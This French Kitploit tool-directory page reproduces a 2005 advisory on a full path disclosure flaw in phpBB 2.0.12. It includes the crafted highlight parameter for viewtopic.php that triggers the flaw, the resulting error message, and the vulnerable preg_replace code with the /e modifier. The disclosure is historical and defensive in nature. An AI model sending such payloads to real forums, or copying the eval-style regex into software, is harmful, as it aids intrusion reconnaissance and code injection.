Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2005-0603-phpBB-2.0.12-Full-path-disclosure — Exploit de preuve de concept pour CVE-2005-0603, démontrant une vulnérabilité de divulgation de chemin complet dans phpBB 2.0.12 via une regex conçue dans le paramètre highlight de viewtopic.php. | Kitploit
Outils/GitHubGitHub/parcer0/cve-2005-0603-phpbb-2.0.12-full-path-disclosure
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubparcer0/cve-2005-0603-phpbb-2.0.12-full-path-disclosure

CVE-2005-0603-phpBB-2.0.12-Full-path-disclosure

Exploit de preuve de concept pour CVE-2005-0603, démontrant une vulnérabilité de divulgation de chemin complet dans phpBB 2.0.12 via une regex conçue dans le paramètre highlight de viewtopic.php.

Voir le dépôt
il y a 6 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0603

[N]eo [S]ecurity [T]eam [NST]® - Avis n°06 - 25/02/05

Programme : phpBB 2.0.12 Page d'accueil : http://www.phpbb.com Versions vulnérables : phpBB 2.0.12 et versions antérieures Risque : Risque faible !! Impact : Divulgation du chemin complet

root@kitploit:~
  -==Divulgation du chemin complet dans phpBB 2.0.12==-

  • Description

phpBB est un système de forum open source puissant, entièrement extensible et hautement personnalisable. Il offre une interface conviviale, un panneau d'administration simple et direct, ainsi qu'une FAQ utile. Basé sur le puissant langage serveur PHP et votre choix de serveurs de bases de données MySQL, MS-SQL, PostgreSQL ou Access/ODBC, phpBB est la solution communautaire gratuite idéale pour tous les sites web.

  • Testé sur

localhost et de nombreux forums

  • Exploitation

phpBB/viewtopic.php?p=6&highlight=[HaCkZaTaN]

Cela affichera quelque chose comme ceci :

Warning: Compilation failed: missing terminating ] for character class at offset 20 in /home/nst/forum/viewtopic.php(1110) : regexp code on line 1

Cela divulguera le chemin complet et j'ai aussi remarqué que les messages changent, rien ne s'affiche. Dans la variable HighLight

Voici le problème : -----[ Début du code vulnérable ] ------------------------------------

1106: if ($highlight_match) 1107: { 1108: // This was shamelessly 'borrowed' from volker at multiartstudio dot de 1109: // via php.net's annotated manual 1110: $message = str_replace('"', '"',
substr(preg_replace('#(>(((?>([^><]+|(?R)))*)<))#se', "preg_replace('#\b(" .
$highlight_match . ")\b#i', '<span style="color:#" . $theme['fontcolor3'] .
"">\\1', '\0')", '>' . $message . '<'), 1, -1)); 1111: }

-----[ Fin du code vulnérable ] ------------------------------------ Ne copiez pas des trucs comme ça lol.

  • Exploit

Pas encore xD

  • Solutions

Pas encore xD

Autre chose que j'ai remarquée dans php.ini :

magic_quotes_gpc = On magic_quotes_sybase = Off

Vous devez activer les deux.

  • Références

http://neossecurity.net/Advisories/Advisory-06.txt

  • Crédits

Découvert par HaCkZaTaN [email protected]

[N]eo [S]ecurity [T]eam [NST]® - http://neossecurity.net/

Des questions ? http://neossecurity.net/

Irc.InfoGroup.cl #neosecurityteam

  • Salutations

root@kitploit:~
       Paisterist
       T0wn3r
   Heap
       Nitrous
       CrashCool
       eL_mEsIaS
       Makoki

       Et mon peuple colombien
Télécharger l’outil